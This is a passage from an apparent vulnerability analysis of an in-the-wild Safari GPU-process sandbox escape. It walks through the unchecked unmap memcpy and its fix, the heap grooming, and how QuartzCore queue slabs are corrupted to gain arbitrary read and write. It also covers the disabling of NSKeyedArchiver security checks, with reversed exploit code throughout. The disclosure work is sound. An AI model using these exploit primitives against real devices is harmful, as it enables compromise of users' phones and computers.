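  std::map<uint64_t, uint64_t> used;  // base -> size, sorted by address

  uint64_t alloc(uint64_t size) {
    uint64_t candidate = 0x10000;     // arbitrary VA floor
    for (const auto& [base, sz] : used) {
      if (base - candidate >= size) break;  // first gap that fits wins
      candidate = base + sz;
    }
    used[candidate] = size;
    return candidate;
  }

  void free(uint64_t base) { used.erase(base); }
};

int main() {
  FirstFit vm;
  uint64_t a = vm.alloc(0x4000);  // ImageBuffer-like allocation
  vm.alloc(0x4000);               // neighbouring allocation
  vm.free(a);                     // ReleaseResource leaves a hole
  assert(vm.alloc(0x4000) == a);  // the next CreateBuffer lands exactly in it
}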

mapAsync

With the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:

void* Buffer::getMappedRange(size_t offset, size_t size)

{

    // https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange

    auto rangeSize = size;

    if (size == WGPU_WHOLE_MAP_SIZE)

        rangeSize = computeRangeSize(m_size, offset);

    if (!validateGetMappedRange(offset, rangeSize)) {

        // FIXME: "throw an OperationError and stop."

        return nullptr;

    }

    m_mappedRanges.add({ offset, offset + rangeSize });

    m_mappedRanges.compact();

    return static_cast<char*>(m_buffer.contents) + offset;

}

m_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack, that raw pointer and length are stored into the m_mappedRange field. The higher-level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector<> to send back over IPC.

unmap

Here's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector<> sent by the WebContent client.

void RemoteBuffer::unmap(Vector<uint8_t>&& data)

{

    if (!m_mappedRange)

        return;

    ASSERT(m_isMapped);

    if (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))

        memcpy(m_mappedRange->source, data.data(), data.size());

    m_isMapped = false;

    m_mappedRange = std::nullopt;

    m_mapModeFlags = { };

}

The issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector<> of "modified contents" actually matches the size of the previously mapped range. Instead the code simply blindly memcpy's the client-supplied Vector<> into the mapped range using the Vector<>'s size rather than the range's.

This unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.

Here's the fix:

  void RemoteBuffer::unmap(Vector<uint8_t>&& data)

  {

-   if (!m_mappedRange)

+   if (!m_mappedRange || m_mappedRange->byteLength < data.size())

      return;

    ASSERT(m_isMapped);

It should be noted that security issues with WebGPU are well-known and the javascript interface to WebGPU is disabled in Safari on iOS. But the IPCs which support that javascript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface. This seems like a significant oversight.

Destination unknown?

The allocation site for the GPU buffer was hard to determine statically, which made it hard to get a picture of what objects were being groomed. Figuring out the overflow target and its allocation site was similarly tricky.

Statically following the implementation of the RemoteRenderingBackend::CreateImageBuffer IPC - which, based on the high-level flow of the exploit, appeared to be responsible for allocating the overflow target - again quickly ended up in system library code with no obvious targets.

Working with the theory that, given the simplicity of the heap groom, vm_allocate/mmap was somehow responsible for the allocations, I set breakpoints on those APIs in the Safari GPU process on an M1 mac and ran the WebGL conformance tests. There was only a single place where mmap was called:

Target 0: (com.apple.WebKit.GPU) stopped.

(lldb) bt

* thread #30, name = 'RemoteRenderingBackend work queue',

  stop reason = breakpoint 12.1

* frame #0: mmap

  frame #1: QuartzCore`CA::CG::Queue::allocate_slab

  frame #2: QuartzCore`CA::CG::Queue::alloc

  frame #3: QuartzCore`CA::CG::ContextDelegate::fill_rects

  frame #4: QuartzCore`CA::CG::ContextDelegate::draw_rects_

  frame #5: CoreGraphics`CGContextFillRects

  frame #6: CoreGraphics`CGContextFillRect

  frame #7: CoreGraphics`CGContextClearRect

  frame #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create

  frame #9: WebKit::RemoteRenderingBackend::createImageBuffer

This corresponds perfectly with the IPC we see called in the heap groom above!

To the core...

QuartzCore is part of the low-level drawing/rendering code on iOS. Reversing the code around the mmap site it seems to be a custom queue type used for drawing commands. Dumping the mmap'ed QueueSlab memory a little later on we see some structure:

(lldb) x/10xg $x0

0x13574c000: 0x00000001420041d0 0x0000000000000000

0x13574c010: 0x0000000000004000 0x0000000000003f10

0x13574c020: 0x000000013574c0f0 0x0000000000000000

Reversing some of the surrounding QuartzCore code we can figure out that the header has a structure something like this:

struct QuartzQueueSlab

{

  struct QuartzQueueSlab *free_list_ptr;

  uint64_t size_a;

  uint64_t mmap_size;

  uint64_t remaining_size;

  uint64_t end;  // the bump pointer into inline_buffer

  uint64_t f;

  uint8_t inline_buffer[16336];

};

It's a short header with a free-list pointer, some sizes then a pointer into an inline buffer. The fields are initialized like this:

mapped_base->free_list_ptr = 0;

mapped_base->size_a = 0;

mapped_base->mmap_size = mmap_size;

mapped_base->remaining_size = mmap_size - 0x30;

mapped_base->end = mapped_base->inline_buffer;

Diagram showing the state of a fresh QueueSlab, with the end pointer pointing to the start of the inline buffer.

The QueueSlab is a simple bump allocator. end starts off pointing to the start of the inline buffer, and gets bumped up by each allocation as long as remaining_size indicates there's still space available:

Diagram showing the end pointer moving forwards within the allocated slab buffer

Assuming that this is indeed the corruption target, the bytes with which the call to RemoteBuffer::Unmap would corrupt this header line up like this:

Diagram showing the QueueSlab fields corrupted by the primitive, with the arg value replacing the end inline-buffer pointer

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

The exploit's wrapper around the RemoteBuffer::Unmap IPC takes a single argument, which lines up perfectly with the inline-buffer pointer (end) of the QueueSlab, replacing it with an arbitrary value.
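Putting that together, here's a sketch (my reconstruction, using the QuartzQueueSlab struct reversed earlier) of what the 40-byte Unmap payload does when it lands on the adjacent QueueSlab header:

#include <cstdint>
#include <cstring>

void corrupt_queue_slab(struct QuartzQueueSlab *slab, uint64_t target) {
  uint64_t b[5] = { 0x7F6F3229,  // free_list_ptr: arbitrary marker value
                    0,           // size_a
                    0,           // mmap_size
                    0xFFFF,      // remaining_size: claims plenty of free space
                    target };    // end: the next Queue::alloc allocates here
  memcpy(slab, b, sizeof(b));    // what the bad memcpy in unmap() effects
}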

The queue slab is pointed to by a higher-level CA::CG::Queue object, which in turn is pointed to by a CGContext object.

Groom 2

Before triggering the Unmap overflow there's another groom:

remote_device_after_base_id = rand();

for (j = 0; j < 200; j++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + j);

}

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

IPC_RemoteRenderingBackend_CacheNativeImage(

  image_buffer_base_id + 34LL);

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

for (k = 0; k < 200; k++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + 200 + k);

}

This is clearly trying to place an allocation related to RemoteRenderingBackend::CacheNativeImage near a large number of allocations related to RemoteDevice::CreateBuffer which is the IPC we saw earlier which causes the allocation of RemoteBuffer objects. The purpose of this groom will become clear later.

Overflow 1

The core primitive for the first overflow involves 4 IPC methods:

  1. RemoteBuffer::MapAsync - sets up the destination pointer for the overflow
  2. RemoteBuffer::Unmap - performs the overflow, corrupting queue metadata
  3. RemoteDisplayListRecorder::DrawNativeImage - uses the corrupted queue metadata to write a pointer to a controlled address
  4. RemoteCDMFactoryProxy::CreateCDM - discloses the written pointer value

We'll look at each of those in turn:

IPC 1 - MapAsync

for (m = 0; m < 6; m++) {

  index_of_corruptor = m;

  IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                            0x4000LL,

                            0LL);

Diagram showing the relationship between RemoteBuffer objects, their backing buffers and the QueueSlab pages. The backing buffers and QueueSlab pages alternate

They iterate through all 6 of the RemoteBuffer objects in the hope that the groom successfully placed at least one of them directly before a QueueSlab allocation. This MapAsync IPC sets the RemoteBuffer's m_mappedRange->source field to point at the very end of the backing buffer (hopefully right at a QueueSlab).

IPC 2 - Unmap

  wrap_remote_buffer_unmap(

    remote_device_buffer_id_base + m,

    WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88);

wrap_remote_buffer_unmap is the wrapper function we've seen snippets of before which calls the Unmap IPC:

void* wrap_remote_buffer_unmap(int64 dst, int64 arg)

{

  int64 b[5];

  b[0] = 0x7F6F3229LL;

  b[1] = 0LL;

  b[2] = 0LL;

  b[3] = 0xFFFFLL;

  b[4] = arg;

  return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

}

The arg value passed to wrap_remote_buffer_unmap (which is the base target address for the overwrite in the next step) is (WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88), a symbol which was linked by the JS find-and-replace on the Mach-O; it points to the global variable used here:

int64 WTF::ObjectIdentifierBase::generateIdentifierInternal()

{

  return ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;

}

As the name suggests, this is used to generate unique ids using a monotonically-increasing counter (there is a level of locking above this function). The value passed in the Unmap IPC points 0x88 below the address of ::current.

Diagram showing the corruption primitive being used to move the end pointer out of the allocated buffer to 0x88 bytes below the target

If the groom works, this has the effect of corrupting a QueueSlab's inline buffer pointer with a pointer to 0x88 bytes below the counter used by the GPU process to allocate new identifiers.

IPC 3 - DrawNativeImage

for ( n = 0; n < 0x22; ++n )  {

  if (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {

    continue;

  }

  IPC_RemoteDisplayListRecorder_DrawNativeImage(

    image_buffer_base_id + n,      // potentially corrupted target

    image_buffer_base_id + 34LL);

}

The exploit then iterates through all the ImageBuffer objects (skipping those which were released to make gaps for the RemoteBuffers) and passes each in turn as the first argument to IPC_RemoteDisplayListRecorder_DrawNativeImage. The hope is that one of them had their associated QueueSlab structure corrupted. The second argument passed to DrawNativeImage is the ImageBuffer which had CacheNativeImage called on it earlier.

Let's follow the implementation of DrawNativeImage on the GPU process side to see what happens with the corrupted QueueSlab associated with that first ImageBuffer:

void RemoteDisplayListRecorder::drawNativeImage(

  RenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  drawNativeImageWithQualifiedIdentifier(

    {imageIdentifier, m_webProcessIdentifier},

    imageSize,

    destRect,

    srcRect,

    options);

}

This immediately calls through to:

void

RemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(

  QualifiedRenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  RefPtr image = resourceCache().cachedNativeImage(imageIdentifier);

  if (!image) {

    ASSERT_NOT_REACHED();

    return;

  }

  handleItem(DisplayList::DrawNativeImage(

               imageIdentifier.object(),

               imageSize,

               destRect,

               srcRect,

               options),

             *image);

}

imageIdentifier here corresponds to the ID of the ImageBuffer which was passed to CacheNativeImage earlier. Looking briefly at the implementation of CacheNativeImage we can see that it allocates a NativeImage object (which is what ends up being returned by the call to cachedNativeImage above):

void

RemoteRenderingBackend::cacheNativeImage(

  const ShareableBitmap::Handle& handle,

  RenderingResourceIdentifier nativeImageResourceIdentifier)

{

  cacheNativeImageWithQualifiedIdentifier(

    handle,

    {nativeImageResourceIdentifier,

      m_gpuConnectionToWebProcess->webProcessIdentifier()}

  );

}

void

RemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(

  const ShareableBitmap::Handle& handle,

  QualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)

{

  auto bitmap = ShareableBitmap::create(handle);

  if (!bitmap)

    return;

  auto image = NativeImage::create(

                 bitmap->createPlatformImage(

                   DontCopyBackingStore,

                   ShouldInterpolate::Yes),

                 nativeImageResourceIdentifier.object());

  if (!image)

    return;

  m_remoteResourceCache.cacheNativeImage(

    image.releaseNonNull(),

    nativeImageResourceIdentifier);

}

This NativeImage object is allocated by the default system malloc.

Returning to the DrawNativeImage flow we reach this:

void DrawNativeImage::apply(GraphicsContext& context, NativeImage& image) const

{

    context.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);

}

The context object is a GraphicsContextCG, a wrapper around a system CoreGraphics CGContext object:

void GraphicsContextCG::drawNativeImage(NativeImage& nativeImage, const FloatSize& imageSize, const FloatRect& destRect, const FloatRect& srcRect, const ImagePaintingOptions& options)

This ends up calling:

CGContextDrawImage(context, adjustedDestRect, subImage.get());

Which calls CGContextDrawImageWithOptions.

Through a few more levels of indirection in the CoreGraphics library this eventually reaches:

int64 CA::CG::ContextDelegate::draw_image_(

  int64 delegate,

  int64 a2,

  int64 a3,

  CGImage *image...) {

...

  alloc_from_slab = CA::CG::Queue::alloc(queue, 160);

  if (alloc_from_slab)

   CA::CG::DrawImage::DrawImage(

     alloc_from_slab,

     Info_2,

     a2,

     a3,

     FillColor_2,

     &v18,

     AlternateImage_0);

Via the delegate object the code retrieves the CGContext and from there the Queue with the corrupted QueueSlab. They then make a 160 byte allocation from the corrupted queue slab.

void*

CA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)

{

  uint64_t *buffer;

...

  size_rounded = (size + 31) & 0xFFFFFFFFFFFFFFF0LL;

  current_slab = q->current_slab;

  if ( !current_slab )

    goto alloc_slab;

  if ( !q->c || current_slab->remaining_size >= size_rounded )

    goto GOT_ENOUGH_SPACE;

...

GOT_ENOUGH_SPACE:

    remaining_size = current_slab->remaining_size;

    new_remaining = remaining_size - size_rounded;

    if ( remaining_size >= size_rounded )

    {

      buffer = current_slab->end;

      current_slab->remaining_size = new_remaining;

      current_slab->end = buffer + size_rounded;

      goto RETURN_ALLOC;

...

RETURN_ALLOC:

  buffer[0] = size_rounded;

  atomic_fetch_add(q->alloc_meta);

  buffer[1] = q->alloc_meta;

...

  return &buffer[2];

}

When CA::CG::Queue::alloc attempts to allocate from the corrupted QueueSlab, it sees that the slab claims to have 0xffff bytes of free space remaining, so it proceeds to write a 0x10 byte header into the buffer by following the end pointer, then returns that end pointer plus 0x10. This has the effect of returning a value which points 0x78 bytes below the WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current global.

draw_image_ then passes this allocation as the first argument to CA::CG::DrawImage::DrawImage (with the cachedImage pointer as the final argument):

int64 CA::CG::DrawImage::DrawImage(

  int64 slab_buf,

  int64 a2,

  int64 a3,

  int64 a4,

  int64 a5,

  OWORD *a6,

  CGImage *img)

{

...

*(int64 *)(slab_buf + 0x78) = CGImageRetain(img);

DrawImage writes the pointer to the cachedImage object to +0x78 in the fake slab allocation, which happens now to exactly overlap WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current. This has the effect of replacing the current value of the ::current monotonic counter with the address of the cached NativeImage object.
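A quick worked check that the offsets line up (constants taken from the analysis above):

constexpr unsigned kEndBelowCurrent  = 0x88;  // Unmap pointed end here, below ::current
constexpr unsigned kQueueAllocHeader = 0x10;  // header written by Queue::alloc
constexpr unsigned kDrawImageStore   = 0x78;  // DrawImage stores the CGImage* at +0x78
static_assert(kEndBelowCurrent - kQueueAllocHeader == kDrawImageStore,
              "the retained CGImage* lands exactly on ::current");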

IPC 4 - CreateCDM

The final step in this section is to then call any IPC which causes the GPU process to allocate a new identifier using generateIdentifierInternal:

interesting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();

If the new identifier is greater than 0x10000 they mask off the lower 4 bits and have successfully disclosed the remote address of the cached NativeImage object.
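In code, the recovery looks something like this (my reconstruction; the IPC wrapper name is the reversed one used throughout this post):

// ::current now holds the NativeImage pointer, each new identifier is
// ++current, and malloc's 16-byte alignment means the pointer's low 4 bits
// started out as zero - masking undoes the handful of increments.
uint64_t id = IPC_RemoteCDMFactoryProxy_CreateCDM();
if (id > 0x10000) {                      // clearly a pointer, not a small counter
  uint64_t native_image = id & ~0xFULL;  // GPU-process address of the NativeImage
}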

Over and over - arbitrary read

The next stage is to build an arbitrary read primitive, this time using 5 IPCs:

  1. MapAsync - sets up the destination pointer for the overflow
  2. Unmap - performs the overflow, corrupting queue metadata
  3. SetCTM - sets up parameters
  4. FillRect - writes the parameters through a controlled pointer
  5. CreateRecorder - returns data read from an arbitrary address

Arbitrary read IPC 1 & 2: MapAsync/Unmap

MapAsync and Unmap are used to again corrupt the same QueueSlab object, but this time the queue slab buffer pointer is corrupted to point 0x18 bytes below the following symbol:

WebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl

Specifically, that symbol is the constant StringImpl object for the "audio/mp4" string returned by reference from this function:

const String&

MediaRecorderPrivateWriter::mimeType() const {

  static NeverDestroyed<const String>

    audioMP4(MAKE_STATIC_STRING_IMPL("audio/mp4"));

  static NeverDestroyed<const String>

    videoMP4(MAKE_STATIC_STRING_IMPL("video/mp4"));

  return m_hasVideo ? videoMP4 : audioMP4;

}

Concretely this is a StringImplShape object with this layout:

class STRING_IMPL_ALIGNMENT StringImplShape {

    unsigned m_refCount;

    unsigned m_length;

    union {

        const LChar* m_data8;

        const UChar* m_data16;

        const char* m_data8Char;

        const char16_t* m_data16Char;

    };

    mutable unsigned m_hashAndFlags;

};

Arbitrary read IPC 3: SetCTM

The next IPC is RemoteDisplayListRecorder::SetCTM:

messages -> RemoteDisplayListRecorder NotRefCounted Stream {

...

    SetCTM(WebCore::AffineTransform ctm) StreamBatched

...

CTM is the "Current Transform Matrix" and the WebCore::AffineTransform object passed as the argument is a simple struct with 6 double values defining an affine transformation.

The exploit IPC wrapper function takes two arguments in addition to the image buffer id, and from the surrounding context it's clear that they must be a length and pointer for the arbitrary read:

IPC_RemoteDisplayListRecorder_SetCTM(

  candidate_corrupted_target_image_buffer_id,

  (read_this_much << 32) | 0x100,

  read_from_here);

The wrapper passes those two 64-bit values as the first two "doubles" in the IPC. On the receiver side the implementation doesn't do much apart from directly storing those affine transform parameters into the CGContext's CGGState object:

void

setCTM(const WebCore::AffineTransform& transform) final

{

  GraphicsContextCG::setCTM(

    m_inverseImmutableBaseTransform * transform);

}

void

GraphicsContextCG::setCTM(const AffineTransform& transform)

{

  CGContextSetCTM(platformContext(), transform);

  m_data->setCTM(transform);

  m_data->m_userToDeviceTransformKnownToBeIdentity = false;

}

Reversing CGContextSetCTM we see that the transform is just stored into a 0x30 byte field at offset +0x18 in the CGContext's CGGState object (at +0x60 in the CGContext):

188B55CD4  EXPORT _CGContextSetCTM                      

188B55CD4  MOV   X8, X0

188B55CD8  CBZ   X0, loc_188B55D0C

188B55CDC  LDR   W9, [X8,#0x10]

188B55CE0  MOV   W10, #'CTXT'

188B55CE8  CMP   W9, W10

188B55CEC  B.NE  loc_188B55D0C

188B55CF0  LDR   X8, [X8,#0x60]

188B55CF4  LDP   Q0, Q1, [X1]

188B55CF8  LDR   Q2, [X1,#0x20]

188B55CFC  STUR  Q2, [X8,#0x38]

188B55D00  STUR  Q1, [X8,#0x28]

188B55D04  STUR  Q0, [X8,#0x18]

188B55D08  RET

Arbitrary read IPC 4: FillRect

This IPC takes a similar path to the DrawNativeImage IPC discussed earlier. It allocates a new buffer from the corrupted QueueSlab, with the value returned by CA::CG::Queue::alloc this time pointing 8 bytes below the "audio/mp4" StringImpl. FillRect eventually reaches this code:

CA::CG::DrawOp::DrawOp(slab_ptr, a1, a3, CGGState, a5, v24);

...

  CTM_2 = (_OWORD *)CGGStateGetCTM_2(CGGState);

  v13 = CTM_2[1];

  v12 = CTM_2[2];

  *(_OWORD *)(slab_ptr + 8) = *CTM_2;

  *(_OWORD *)(slab_ptr + 0x18) = v13;

  *(_OWORD *)(slab_ptr + 0x28) = v12;

…which just directly copies the 6 CTM doubles to offset +8 in the allocation returned by the corrupted QueueSlab, which overlaps completely with the StringImpl, corrupting the string length and buffer pointer.
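Concretely, here's my reconstruction of how the first two "doubles" land on the StringImplShape fields (the slab allocation points 8 bytes below the StringImpl, and the copy starts at +8, i.e. right on top of it):

#include <cstdint>
#include <cstring>

void corrupt_mime_type_string(StringImplShape *s,
                              uint64_t read_this_much,
                              uint64_t read_from_here) {
  // First "double": low 32 bits land on m_refCount (0x100, so the string is
  // never freed), high 32 bits land on m_length (the arbitrary read length).
  uint64_t first = (read_this_much << 32) | 0x100;
  memcpy(s, &first, sizeof(first));
  // Second "double" lands on the m_data8 union: the arbitrary read source.
  memcpy(reinterpret_cast<char *>(s) + 8, &read_from_here,
         sizeof(read_from_here));
}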

Arbitrary read IPC 5: CreateRecorder

messages -> RemoteMediaRecorderManager NotRefCounted {

  CreateRecorder(

    WebKit::MediaRecorderIdentifier id,

    bool hasAudio,

    bool hasVideo,

    struct WebCore::MediaRecorderPrivateOptions options)

      ->

    ( std::optional<WebCore::ExceptionData> creationError,

      String mimeType,

      unsigned audioBitRate,

      unsigned videoBitRate)

  ReleaseRecorder(WebKit::MediaRecorderIdentifier id)

}

The CreateRecorder IPC returns, among other things, the contents of the mimeType String which FillRect corrupted to point to an arbitrary location, yielding the arbitrary read primitive.

What to read?

Recall that the cacheNativeImage operation was sandwiched between the allocation of 400 RemoteBuffer objects via the RemoteDevice::CreateBuffer IPC.

Note that earlier (for the MapAsync/Unmap corruption) it was the backing buffer pages of the RemoteBuffer which were the groom target - that's not the case for the memory disclosure. The target is instead the AGXG15FamilyBuffer object, the wrapper object which points to those backing pages. These are also allocated during the RemoteDevice::CreateBuffer IPC calls. Crucially, these wrapper objects are allocated by the default malloc implementation, which is malloc_zone_malloc using the default ("scalable") zone. @elvanderb covered the operation of this heap allocator in their "Heapple Pie" presentation. Provided that the targeted allocation size's freelist is empty, this zone will allocate upwards, making it likely that the NativeImage and AGXG15FamilyBuffer objects will be near each other in virtual memory.

They use the arbitrary read primitive to read 3 pages of data from the GPU process, starting from the address of the cached NativeImage, and search for an Objective-C isa pointer matching the AGXG15FamilyBuffer class (masking out any PAC bits):

for ( ii = 0; ii < 0x1800; ++ii ) {

  if ( ((leaker_buffer_contents[ii] >> 8) & 0xFFFFFFFF0LL) ==

    (AGXMetalG15::_OBJC_CLASS___AGXG15FamilyBuffer & 0xFFFFFFFF0LL) )

...

What to write?

If the search is successful they now know the absolute address of one of the AGXG15FamilyBuffer objects - but at this point they don't know which of the RemoteBuffer objects it corresponds to.

They use the same MapAsync/Unmap/SetCTM/FillRect IPCs as in the setup for the arbitrary read to write the address of WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current (the monotonic unique id counter seen earlier) into the field at +0x98 of the AGXG15FamilyBuffer.

Looking at the class hierarchy of AGXG15FamilyBuffer (AGXG15FamilyBuffer : AGXBuffer : IOGPUMetalBuffer : IOGPUMetalResource : _MTLResource : _MTLObjectWithLabel : NSObject) we find that +0x98 is the virtualAddress property of IOGPUMetalResource.

@interface IOGPUMetalResource : _MTLResource <MTLResourceSPI> {

        IOGPUMetalResource* _res;

        IOGPUMetalResource* next;

        IOGPUMetalResource* prev;

        unsigned long long uniqueId;

}

@property (readonly) _IOGPUResource* resourceRef;

@property (nonatomic,readonly) void* virtualAddress;

@property (nonatomic,readonly) unsigned long long gpuAddress;

@property (nonatomic,readonly) unsigned resourceID;

@property (nonatomic,readonly) unsigned long long resourceSize;

@property (readonly) unsigned long long cpuCacheMode;

I mentioned earlier that the destination pointer for the MapAsync/Unmap bad memcpy was calculated from a buffer property called contents, not virtualAddress:

  return static_cast<char*>(m_buffer.contents) + offset;

Dot syntax in Objective-C is syntactic sugar around calling an accessor method, and the contents accessor directly calls the virtualAddress accessor, which returns the virtualAddress field:

void* -[IOGPUMetalBuffer contents]

  B               _objc_msgSend$virtualAddress_1

[IOGPUMetalResource virtualAddress]

ADRP   X8, #_OBJC_IVAR_$_IOGPUMetalResource._res@PAGE

LDRSW  X8, [X8,#_OBJC_IVAR_$_IOGPUMetalResource._res@PAGEOFF] ; 0x18

ADD    X8, X0, X8

LDR    X0, [X8,#0x80]

RET

They then loop through each of the candidate RemoteBuffer objects, mapping the beginning then unmapping with an 8 byte buffer, causing a write of a sentinel value through the potentially corrupted IOGPUMetalResource::virtualAddress field:

for ( jj = 200; jj < 400; ++jj )

{

  sentinel = 0x3A30DD9DLL;

  IPC_RemoteBuffer_MapAsync(remote_device_after_base_id + jj, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(remote_device_after_base_id + jj, &sentinel, 8LL);

  semaphore_signal(semaphore_a);

  CDM = IPC_RemoteCDMFactoryProxy_CreateCDM();

  if ( CDM >= 0x3A30DD9E && CDM <= 0x3A30DF65 ) {

    ...

After each write they request a new CDM and look to see whether they got a resource ID near the sentinel value they set - if so then they've found a RemoteBuffer whose virtual address they can completely control!

They store this id and use it to build their final arbitrary write primitive with 6 IPCs:

arbitrary_write(u64 ptr, u64 value_ptr, u64 size) {

  IPC_RemoteBuffer_MapAsync(

   remote_device_buffer_id_base + index_of_corruptor,

   0x4000LL, 0LL);

  wrap_remote_buffer_unmap(

    remote_device_buffer_id_base + index_of_corruptor,

    agxg15familybuffer_plus_0x80);

  IPC_RemoteDisplayListRecorder_SetCTM(

    candidate_corrupted_target_image_buffer_id,

    ptr,

    0LL);

  IPC_RemoteDisplayListRecorder_FillRect(

    candidate_corrupted_target_image_buffer_id);

  IPC_RemoteBuffer_MapAsync(

    device_id_with_corrupted_backing_buffer_ptr, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(

    device_id_with_corrupted_backing_buffer_ptr, value_ptr, size);

}

The first MapAsync/Unmap pair corrupts the original QueueSlab to point the buffer pointer to 0x18 bytes below the address of the virtualAddress field of an AGXG15FamilyBuffer.

SetCTM and FillRect then cause the arbitrary write target pointer value to be written through the corrupted QueueSlab allocation to replace the AGXG15FamilyBuffer's virtualAddress member.

The final MapAsync/Unmap pair then write through that corrupted virtualAddress field, yielding an arbitrary write primitive which won't corrupt any surrounding memory.

Mitigating mitigations

At this point the attackers have an arbitrary read/write primitive - it's surely game over. But nevertheless, the most fascinating parts of this exploit are still to come.

Remember, they are not seeking just to exploit this one vulnerability; they are seeking to minimize the marginal cost of building and maintaining as many full exploit chains as possible. This is typically done using custom frameworks which permit code-reuse across exploits. In this case the goal is to use some resources (IOKit userclients) which only the GPU Process has access to, but this is done in a very generic way using a custom framework requiring only a few arbitrary writes to kick off.


What's old is new again - NSArchiver

The FORCEDENTRY sandbox escape exploit which I wrote about last year used a logic flaw to enable the evaluation of an NSExpression across a sandbox boundary. If you're unfamiliar with NSExpression exploitation I'd recommend reading that post first.

As part of the fix for that issue Apple introduced various hardening measures intended to restrict both the computational power of NSExpressions as well as the particular avenue used to cause the evaluation of an NSExpression during object deserialization.

The functionality was never actually removed though. Instead, it was deprecated and gated behind various flags. This likely did lock down the attack surface from certain perspectives; but with a sufficiently powerful initial primitive (like an arbitrary read/write) those flags can simply be flipped and the full power of NSExpression-based scripting can be regained. And that's exactly what this exploit continues on to do...

Flipping bits

Using the arbitrary read/write they flip the globals used in places like __NSCoderEnforceFirstPartySecurityRules to disable various security checks.

They also swap around the implementation class of NSSharedKeySet to be PrototypeTools::_OBJC_CLASS___PTModule and swap the NSKeyPathSpecifierExpression and NSFunctionExpression classRefs to point to each other.

Forcing Entry

We've seen throughout this writeup that Safari has its own IPC mechanism with custom serialization - it's not using XPC or MIG or protobuf or Mojo or any of the dozens of other serialization options. But is it the case that everything gets serialized with their custom code?

As we observed in the FORCEDENTRY writeup, it's often just one tiny, innocuous line of code which ends up opening up an enormous extra attack surface. In FORCEDENTRY it was a seemingly simple attempt to edit the loop count of a GIF. Here, there's another simple piece of code which opens up a potentially unexpected huge extra attack surface: NSKeyedArchiver. It turns out, you can get NSKeyedArchiver objects serialized and deserialized across a Safari IPC boundary, specifically using this IPC:

  RedirectReceived(

    WebKit::RemoteMediaResourceIdentifier identifier,

    WebCore::ResourceRequest request,

    WebCore::ResourceResponse response)

  ->

    (WebCore::ResourceRequest returnRequest)

This IPC takes two arguments:

WebCore::ResourceRequest request

WebCore::ResourceResponse response

Let's look at the ResourceRequest deserialization code:

bool

ArgumentCoder<ResourceRequest>::decode(

  Decoder& decoder,

  ResourceRequest& resourceRequest)

{

  bool hasPlatformData;

  if (!decoder.decode(hasPlatformData))

    return false;

  bool decodeSuccess =

    hasPlatformData ?

      decodePlatformData(decoder, resourceRequest)

    :

      resourceRequest.decodeWithoutPlatformData(decoder);

That in turn calls:

bool

ArgumentCoder<WebCore::ResourceRequest>::decodePlatformData(

  Decoder& decoder,

  WebCore::ResourceRequest& resourceRequest)

{

  bool requestIsPresent;

  if (!decoder.decode(requestIsPresent))

     return false;

  if (!requestIsPresent) {

    resourceRequest = WebCore::ResourceRequest();

    return true;

  }

  auto request = IPC::decode<NSURLRequest>(

                   decoder, NSURLRequest.class);

That last line decoding request looks slightly different to the others - rather than calling decoder.decode(), passing the field to decode by reference, they're explicitly typing the field here in the template invocation, which takes a different decoder path:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, Class allowedClass)

{

    return decode<T>(decoder, allowedClass ?

                              @[ allowedClass ] : @[ ]);

}

(note the @[] syntax defines an Objective-C array literal so this is creating an array with a single entry)

This then calls:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, NSArray<Class> *allowedClasses)

{

  auto result = decodeObject(decoder, allowedClasses);

  if (!result)

    return std::nullopt;

  ASSERT(!*result ||

         isObjectClassAllowed((*result).get(), allowedClasses));

  return { *result };

}

This continues on to a different argument decoder implementation than the one we've seen so far:

std::optional<RetainPtr<id>>

decodeObject(

  Decoder& decoder,

  NSArray<Class> *allowedClasses)

{

  bool isNull;

  if (!decoder.decode(isNull))

    return std::nullopt;

  if (isNull)

    return { nullptr };

